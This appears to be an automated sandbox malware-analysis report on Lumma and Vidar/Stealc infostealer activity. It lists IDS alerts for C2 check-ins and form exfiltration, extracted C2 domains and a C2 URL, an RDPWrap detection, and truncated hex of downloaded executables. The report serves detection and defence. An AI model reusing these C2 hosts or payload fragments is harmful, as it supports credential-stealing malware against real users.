Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.5:52777 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.5:62251 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.5:49719 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.5:49725 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.5:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.5:49722 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.5:58673 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.5:62199 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.5:49721 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2056177 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI) : 192.168.2.5:49757 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.5:49758 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.5:49760 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.5:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.5:49763 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.5:49768 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.5:49769 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.5:49764 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.5:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.5:49767 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49710 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.5:49736
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.5:49735
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49725 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49725 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49714 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49714 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49722 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49727 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49724 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49727 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49724 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49734 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49721 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49721 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49712 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49719 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49719 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49758 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49758 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49760 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49760 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49763 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49771 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49763 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49771 -> 172.67.128.144:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49769 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.5:49777
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49761 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49757 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49757 -> 172.67.194.216:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49769 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49768 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49768 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.5:49776
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49766 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49764 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49764 -> 104.21.58.182:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: wallkedsleeoi.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Yara detected RDPWrap Tool

Source: Yara match	File source: 26.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2307313365.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.2254243178.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RDPWInst.exe PID: 4148, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.5:49729 -> 8.46.123.33:3389

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 22:15:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 22:15:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 22:15:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 22:15:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
